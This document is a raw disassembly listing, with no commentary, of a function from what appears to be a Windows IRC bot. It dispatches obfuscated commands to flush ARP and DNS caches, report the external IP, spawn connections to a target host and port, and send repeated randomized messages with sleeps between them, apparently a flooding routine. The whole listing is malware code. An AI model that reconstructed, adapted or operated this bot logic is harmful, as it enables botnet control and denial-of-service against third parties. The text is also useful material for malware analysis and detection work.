push offset aQc9zs1zgzff0 ; "Qc9zS1zGZff0"
call edi ; dword_437174
test eax, eax
jnz short loc_40D17A
call sub_427E13
test eax, eax
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov edi, offset aSArpFlushed_ ; "%s ARP flushed."
jnz loc_40B57A
mov edi, offset aSFailedToFlush ; "%s Failed to flush ARP."
jmp loc_40B57A
; ---------------------------------------------------------------------------
loc_40D17A: ; CODE XREF: sub_40A938+281F�j
push dword ptr [ebx]
push offset aWpuwr_6yfru ; "WpuWr.6YFRU/"
call edi ; dword_437174
test eax, eax
jnz short loc_40D1B9
mov eax, dword_456DF4
test eax, eax
jz short loc_40D1AF
call eax ; dword_456DF4
test eax, eax
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jz short loc_40D1A5
mov edi, offset aSDnsCacheFlush ; "%s DNS cache flushed."
jmp loc_40B57A
; ---------------------------------------------------------------------------
loc_40D1A5: ; CODE XREF: sub_40A938+2861�j
mov edi, offset aSFailedToFlu_0 ; "%s Failed to flush DNS cache."
jmp loc_40B57A
; ---------------------------------------------------------------------------
loc_40D1AF: ; CODE XREF: sub_40A938+2856�j
mov edi, offset aSFailedToLoadD ; "%s Failed to load dnsapi.dll."
jmp loc_40B575
; ---------------------------------------------------------------------------
loc_40D1B9: ; CODE XREF: sub_40A938+284D�j
push dword ptr [ebx]
push offset a6x2ka0buubb_ ; "6x2Ka0buUbB."
call edi ; dword_437174
test eax, eax
jnz loc_40D27E
mov eax, [ebx+4]
test eax, eax
jnz short loc_40D208
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
loc_40D1DB: ; CODE XREF: sub_40A938+2A7C�j
; sub_40A938+937E�j
cmp [ebp+arg_14], 0
jnz short loc_40D1F7
cmp [ebp+arg_18], 0
loc_40D1E5: ; CODE XREF: sub_40A938+4EB3�j
; sub_40A938+519C�j
jnz short loc_40D201
loc_40D1E7: ; CODE XREF: sub_40A938+9275�j
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_40D1F7: ; CODE XREF: sub_40A938+28A7�j
; sub_40A938+4EAA�j ...
cmp [ebp+arg_18], 0
loc_40D1FB: ; CODE XREF: sub_40A938+617F�j
jz loc_4148CF
loc_40D201: ; CODE XREF: sub_40A938:loc_40D1E5�j
; sub_40A938+6164�j ...
push edi
loc_40D202: ; CODE XREF: sub_40A938+9171�j
push ebx
jmp loc_41467E
; ---------------------------------------------------------------------------
loc_40D208: ; CODE XREF: sub_40A938+2897�j
push eax
call dword_456F5C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_4C], eax
jz short loc_40D24C
push 2
lea eax, [ebp+var_4C]
push 4
push eax
call dword_456EB8 ; gethostbyaddr
test eax, eax
jz short loc_40D26A
push dword ptr [eax]
loc_40D22B: ; CODE XREF: sub_40A938+2930�j
push dword ptr [ebx+4]
cmp [ebp+arg_18], 0
push offset aPimgt12pvee_ ; "pImgT12pvEE."
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSSSS_ ; "%s %s: %s -> %s."
jnz loc_4148C2
jmp loc_414891
; ---------------------------------------------------------------------------
loc_40D24C: ; CODE XREF: sub_40A938+28DD�j
push dword ptr [ebx+4]
call dword_456FB4 ; gethostbyname
test eax, eax
jz short loc_40D26A
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
push eax
call dword_456FBC ; inet_ntoa
push eax
jmp short loc_40D22B
; ---------------------------------------------------------------------------
loc_40D26A: ; CODE XREF: sub_40A938+28EF�j
; sub_40A938+291F�j
push offset aJgyqn0dmzir12z ; "jgYqN0dmziR12zQe40gFoLm.rilJR.uuL/I0"
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSS_1 ; "%s %s"
jmp loc_40D132
; ---------------------------------------------------------------------------
loc_40D27E: ; CODE XREF: sub_40A938+288C�j
push dword ptr [ebx]
push offset a4rmbzFcic21 ; "4RmBz/FCic21"
call edi ; dword_437174
test eax, eax
jnz short loc_40D2A1
push [ebp+arg_18]
push [ebp+arg_10]
push dword ptr [esi+0Ch]
call sub_41BD3B
loc_40D299: ; CODE XREF: sub_40A938+1462�j
; sub_40A938+1B6D�j
add esp, 0Ch
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40D2A1: ; CODE XREF: sub_40A938+2951�j
push dword ptr [ebx]
push offset aSc_coSwlk_ ; "SC.Co/swLK/."
call edi ; dword_437174
test eax, eax
jnz loc_40D346
mov ebx, offset dword_457C20
push offset byte_454A34
push ebx
call edi ; dword_437174
test eax, eax
jz short loc_40D2CE
push ebx
call sub_41E3FB
test eax, eax
pop ecx
jz short loc_40D32F
loc_40D2CE: ; CODE XREF: sub_40A938+2989�j
cmp [ebp+arg_14], 0
mov ebx, offset aHm1h_049e4o ; "Hm1H.049e4O/"
mov edi, offset aSObtainingExte ; "%s Obtaining external IP"
jnz short loc_40D2F4
cmp [ebp+arg_18], 0
jnz short loc_40D2FA
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_40D2F4: ; CODE XREF: sub_40A938+29A4�j
cmp [ebp+arg_18], 0
jz short loc_40D309
loc_40D2FA: ; CODE XREF: sub_40A938+29AA�j
push ebx
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 10h
loc_40D309: ; CODE XREF: sub_40A938+29C0�j
mov ecx, [ebp+arg_10]
call sub_41DA92
mov ecx, [ebp+arg_10]
push eax
call sub_41CE5F
mov edi, eax
push 2710h
push edi
call dword_43707C ; WaitForSingleObject
push edi
call dword_437044 ; CloseHandle
loc_40D32F: ; CODE XREF: sub_40A938+2994�j
push 0
push 1
push [ebp+arg_18]
push [ebp+arg_10]
push dword ptr [esi+0Ch]
call sub_41C172
jmp loc_4146D5
; ---------------------------------------------------------------------------
loc_40D346: ; CODE XREF: sub_40A938+2974�j
push dword ptr [ebx]
push offset aLees11vpbnf0 ; "LeEs11vPbnf0"
call edi ; dword_437174
test eax, eax
jnz loc_40EF95
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
push dword ptr [ebx+4]
push offset aLbjvg0r_qmb_ ; "lbJVg0r.qMb."
call edi ; dword_437174
test eax, eax
jnz loc_40D457
xor ecx, ecx
cmp [ebx+4], ecx
jz loc_40E01B
cmp [ebx+8], ecx
jz loc_40E01B
cmp [ebx+0Ch], ecx
jz loc_40E01B
mov eax, [ebx+10h]
cmp eax, ecx
jz loc_40E01B
push eax
call sub_42A030
cmp eax, 0Fh
pop ecx
jle short loc_40D3B9
mov edi, offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
mov ebx, offset aSTooMuchConns_ ; "%s Too Much conns."
jmp loc_40D1DB
; ---------------------------------------------------------------------------
loc_40D3B9: ; CODE XREF: sub_40A938+2A70�j
cmp dword ptr [ebx+14h], 0
jnz short loc_40D3C6
mov dword ptr [ebx+14h], offset byte_454A34
loc_40D3C6: ; CODE XREF: sub_40A938+2A85�j
push dword ptr [ebx+14h]
push dword ptr [ebx+10h]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42660A
add esp, 10h
cmp [ebp+arg_14], 0
jnz short loc_40D423
cmp [ebp+arg_18], 0
jnz short loc_40D429
push dword ptr [ebx+10h]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
push offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
push offset aSLoadedOntoSDA ; "%s Loaded Onto: (%s:%d), Amount: (%d)"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_40D423: ; CODE XREF: sub_40A938+2AB4�j
cmp [ebp+arg_18], 0
jz short loc_40D457
loc_40D429: ; CODE XREF: sub_40A938+2ABA�j
push dword ptr [ebx+10h]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
push offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
push offset aSLoadedOntoSDA ; "%s Loaded Onto: (%s:%d), Amount: (%d)"
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_40D457: ; CODE XREF: sub_40A938+2A38�j
; sub_40A938+2AEF�j
push dword ptr [ebx+4]
push offset aA52n11svyfw0 ; "A52N11SVYFw0"
call edi ; dword_437174
test eax, eax
jnz loc_40D522
cmp [ebx+8], eax
jz loc_40D522
push 2710h
push eax
lea eax, [ebp+var_5CA40]
push eax
call sub_429690
push 104h
lea eax, [ebp+var_2FAC]
push 0
push eax
call sub_429690
push dword ptr [ebx+8]
lea eax, [ebp+var_2FAC]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 24h
push 3
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_68], eax
jle short loc_40D4FB
loc_40D4B9: ; CODE XREF: sub_40A938+2BC1�j
mov eax, [ebp+arg_68]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40D4F0
push eax
lea eax, [ebp+var_5CA40]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_5CA40]
push 104h
push eax
lea eax, [ebp+var_2FAC]
push eax
call sub_429910
add esp, 18h
loc_40D4F0: ; CODE XREF: sub_40A938+2B89�j
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_4]
jl short loc_40D4B9
loc_40D4FB: ; CODE XREF: sub_40A938+2B7F�j
lea eax, [ebp+var_2FAC]
push eax
lea eax, [ebp+var_1F9B0]
push offset aS_5 ; "%s"
push eax
call sub_429A33
lea eax, [ebp+var_1F9B0]
push eax
call sub_4262C5
add esp, 10h
loc_40D522: ; CODE XREF: sub_40A938+2B2B�j
; sub_40A938+2B34�j
push dword ptr [ebx+4]
push offset aHj6vo0jrp9q0 ; "Hj6vo0JRP9Q0"
call edi ; dword_437174
test eax, eax
jnz loc_40D5D0
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40D5D0
push eax
lea eax, [ebp+var_5CC0]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_68], eax
jle short loc_40D5A1
loc_40D55F: ; CODE XREF: sub_40A938+2C67�j
mov eax, [ebp+arg_68]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40D596
push eax
lea eax, [ebp+var_E840]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_E840]
push 100h
push eax
lea eax, [ebp+var_5CC0]
push eax
call sub_429910
add esp, 18h
loc_40D596: ; CODE XREF: sub_40A938+2C2F�j
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_4]
jl short loc_40D55F
loc_40D5A1: ; CODE XREF: sub_40A938+2C25�j
lea eax, [ebp+var_5CC0]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
loc_40D5D0: ; CODE XREF: sub_40A938+2BF6�j
; sub_40A938+2C01�j
push dword ptr [ebx+4]
push offset aR7wrsQhek_0 ; "r7WRs/qHek.0"
call edi ; dword_437174
test eax, eax
jnz loc_40DB6B
cmp [ebx+8], eax
jz loc_40DB6B
call sub_429ACC
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz1234567890abc"...
cdq
pop ecx
lea edi, [ebp+var_768]
idiv ecx
push 0Fh
pop ecx
rep movsd
movsw
movsb
add dl, 41h
mov byte ptr [ebp+arg_68+3], dl
call sub_429ACC
push 0Fh
pop esi
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
movsx eax, byte ptr [ebp+arg_68+3]
push edx
push eax
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
lea eax, [ebp+var_247D0]
push edx
push offset dword_441168
push eax
call sub_429A33
add esp, 0BCh
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
lea eax, [ebp+var_295F0]
push edx
push offset dword_441140
push eax
call sub_429A33
lea eax, [ebp+var_2E410]
push offset unk_4410B0
push eax
call sub_429A33
lea eax, [ebp+var_247D0]
mov edi, offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push edi
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
lea eax, [ebp+var_295F0]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push edi
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
add esp, 44h
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
lea eax, [ebp+var_2E410]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push edi
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
mov edi, 2710h
lea eax, [ebp+var_2BD00]
push edi
push 0
push eax
call sub_429690
push edi
lea eax, [ebp+var_4DFE0]
push 0
push eax
call sub_429690
add esp, 34h
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
mov [ebp+arg_68], edx
call sub_429ACC
cdq
idiv esi
mov esi, dword_437184
mov [ebp+var_4], 8Fh
mov [ebp+arg_8], edx
loc_40D915: ; CODE XREF: sub_40A938+3063�j
call esi ; dword_437184
push eax
call sub_429ABF
cmp [ebp+arg_68], 0Fh
pop ecx
jle short loc_40D932
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_68], edx
loc_40D932: ; CODE XREF: sub_40A938+2FEA�j
cmp [ebp+arg_8], 0Fh
jle short loc_40D946
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_8], edx
loc_40D946: ; CODE XREF: sub_40A938+2FFE�j
call sub_429ACC
push 24h
cdq
pop ecx
idiv ecx
movsx eax, [ebp+edx+var_768]
push eax
lea eax, [ebp+var_2BD00]
push [ebp+arg_8]
push [ebp+arg_68]
push offset dword_44109C
push edi
push eax
call sub_429AEE
add esp, 18h
lea eax, [ebp+var_2BD00]
push eax
lea eax, [ebp+var_4DFE0]
push eax
call dword_437090 ; lstrcatA
inc [ebp+arg_68]
inc [ebp+arg_8]
call esi ; dword_437184
push eax
call sub_429ABF
dec [ebp+var_4]
pop ecx
jnz loc_40D915
lea eax, [ebp+var_4DFE0]
mov esi, offset aSSS ; "%s %s :%s"
push eax
lea eax, [ebp+var_33230]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push esi
push eax
call sub_429A33
lea eax, [ebp+var_33230]
push eax
call sub_4262C5
push edi
lea eax, [ebp+var_30B20]
push 0
push eax
call sub_429690
push edi
lea eax, [ebp+var_10F50]
push 0
push eax
call sub_429690
add esp, 30h
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_68], edx
call sub_429ACC
push 0Fh
mov [ebp+var_4], 8Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_8], edx
loc_40DA12: ; CODE XREF: sub_40A938+3168�j
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
cmp [ebp+arg_68], 0Fh
pop ecx
jle short loc_40DA33
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_68], edx
loc_40DA33: ; CODE XREF: sub_40A938+30EB�j
cmp [ebp+arg_8], 0Fh
jle short loc_40DA47
call sub_429ACC
push 0Fh
cdq
pop ecx
idiv ecx
mov [ebp+arg_8], edx
loc_40DA47: ; CODE XREF: sub_40A938+30FF�j
call sub_429ACC
push 24h
cdq
pop ecx
idiv ecx
movsx eax, [ebp+edx+var_768]
push eax
lea eax, [ebp+var_30B20]
push [ebp+arg_8]
push [ebp+arg_68]
push offset dword_44108C
push edi
push eax
call sub_429AEE
add esp, 18h
lea eax, [ebp+var_30B20]
push eax
lea eax, [ebp+var_10F50]
push eax
call dword_437090 ; lstrcatA
inc [ebp+arg_68]
inc [ebp+arg_8]
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
dec [ebp+var_4]
pop ecx
jnz loc_40DA12
lea eax, [ebp+var_10F50]
push eax
lea eax, [ebp+var_1D2A0]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push esi
push eax
call sub_429A33
lea eax, [ebp+var_1D2A0]
push eax
call sub_4262C5
push edi
lea eax, [ebp+var_1D2A0]
push 0
push eax
call sub_429690
lea eax, [ebp+var_10F50]
push eax
lea eax, [ebp+var_1D2A0]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push esi
push eax
call sub_429A33
lea eax, [ebp+var_1D2A0]
push eax
call sub_4262C5
lea eax, [ebp+var_2230]
push eax
call sub_426698
add esp, 40h
lea eax, [ebp+var_2230]
mov esi, offset aSS_1 ; "%s %s"
push eax
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
lea eax, [ebp+var_59BC]
push esi
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push esi
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
mov esi, [ebp+arg_C]
mov edi, dword_437174
add esp, 28h
loc_40DB6B: ; CODE XREF: sub_40A938+2CA4�j
; sub_40A938+2CAD�j
push dword ptr [ebx+4]
push offset aDuzcb0kgssv0 ; "DuzCb0KgSsv0"
call edi ; dword_437174
test eax, eax
jnz loc_40DD81
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40DD81
push eax
lea eax, [ebp+var_5FC8]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_68], eax
jle short loc_40DBEA
loc_40DBA8: ; CODE XREF: sub_40A938+32B0�j
mov eax, [ebp+arg_68]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40DBDF
push eax
lea eax, [ebp+var_E840]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_E840]
push 100h
push eax
lea eax, [ebp+var_5FC8]
push eax
call sub_429910
add esp, 18h
loc_40DBDF: ; CODE XREF: sub_40A938+3278�j
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_4]
jl short loc_40DBA8
loc_40DBEA: ; CODE XREF: sub_40A938+326E�j
lea eax, [ebp+var_5FC8]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441080
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441070
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441070
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441070
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_44105C
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_44104C
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_44104C
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
loc_40DD81: ; CODE XREF: sub_40A938+323F�j
; sub_40A938+324A�j
push dword ptr [ebx+4]
push offset aDqjso_47pdb ; "dQJSO.47pdb/"
call edi ; dword_437174
test eax, eax
jnz loc_40DE48
cmp [ebx+8], eax
jz loc_40DE48
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441070
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441070
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
call sub_429ACC
cdq
mov ecx, 514h
idiv ecx
push edx
call dword_43718C ; Sleep
push dword ptr [ebx+8]
lea eax, [ebp+var_59BC]
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push offset dword_441070
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
loc_40DE48: ; CODE XREF: sub_40A938+3455�j
; sub_40A938+345E�j
push dword ptr [ebx+4]
push offset aK9vUKkutm ; "K9V/U/KkuTM/"
call edi ; dword_437174
test eax, eax
jnz loc_40DEF6
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40DEF6
push eax
lea eax, [ebp+var_30AC]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_68], eax
jle short loc_40DEC7
loc_40DE85: ; CODE XREF: sub_40A938+358D�j
mov eax, [ebp+arg_68]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40DEBC
push eax
lea eax, [ebp+var_E840]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_E840]
push 100h
push eax
lea eax, [ebp+var_30AC]
push eax
call sub_429910
add esp, 18h
loc_40DEBC: ; CODE XREF: sub_40A938+3555�j
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_4]
jl short loc_40DE85
loc_40DEC7: ; CODE XREF: sub_40A938+354B�j
lea eax, [ebp+var_30AC]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push offset aSSS ; "%s %s :%s"
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
loc_40DEF6: ; CODE XREF: sub_40A938+351C�j
; sub_40A938+3527�j
push dword ptr [ebx+4]
push offset a7yfnz0pw11s1 ; "7yfnz0PW11s1"
call edi ; dword_437174
test eax, eax
jnz loc_40DFA4
mov eax, [ebx+0Ch]
test eax, eax
jz loc_40DFA4
push eax
lea eax, [ebp+var_5ABC]
push offset aS_5 ; "%s"
push eax
call sub_429A33
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_68], eax
jle short loc_40DF75
loc_40DF33: ; CODE XREF: sub_40A938+363B�j
mov eax, [ebp+arg_68]
mov eax, [ebx+eax*4]
test eax, eax
jz short loc_40DF6A
push eax
lea eax, [ebp+var_E840]
push offset aS_1 ; " %s"
push eax
call sub_429A33
lea eax, [ebp+var_E840]
push 100h
push eax
lea eax, [ebp+var_5ABC]
push eax
call sub_429910
add esp, 18h
loc_40DF6A: ; CODE XREF: sub_40A938+3603�j
inc [ebp+arg_68]
mov eax, [ebp+arg_68]
cmp eax, [ebp+arg_4]
jl short loc_40DF33
loc_40DF75: ; CODE XREF: sub_40A938+35F9�j
lea eax, [ebp+var_5ABC]
push eax
lea eax, [ebp+var_59BC]
push dword ptr [ebx+8]
push offset aLcxMHdpwr1_0 ; "lCX/m/HdpWr1"
push offset dword_441040
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 18h
loc_40DFA4: ; CODE XREF: sub_40A938+35CA�j
; sub_40A938+35D5�j
push dword ptr [ebx+4]
push offset aNq_as1z1sit ; "nQ.As1Z1SIt/"
call edi ; dword_437174
test eax, eax
jnz short loc_40DFE2
mov ecx, [ebx+8]
test ecx, ecx
jz short loc_40DFE2
mov eax, [ebx+0Ch]
test eax, eax
jz short loc_40DFE2
push eax
push ecx
lea eax, [ebp+var_59BC]
push offset dword_441030
push eax
call sub_429A33
lea eax, [ebp+var_59BC]
push eax
call sub_4262C5
add esp, 14h
loc_40DFE2: ; CODE XREF: sub_40A938+3678�j
; sub_40A938+367F�j ...
push dword ptr [ebx+4]
push offset aUn3hk0sn58o_0 ; "uN3hk0sn58o/"
call edi ; dword_437174
test eax, eax
jnz short loc_40E051
mov ecx, [ebx+8]
test ecx, ecx
jz short loc_40E051
mov eax, [ebx+0Ch]
test eax, eax
jz short loc_40E02A
push eax
push ecx
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
lea eax, [ebp+var_59BC]
push offset dword_441040
push eax
call sub_429A33
add esp, 14h
jmp short loc_40E044
; ---------------------------------------------------------------------------
loc_40E01B: ; CODE XREF: sub_40A938+2A43�j
; sub_40A938+2A4C�j ...
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
mov edi, offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
jmp loc_410A94
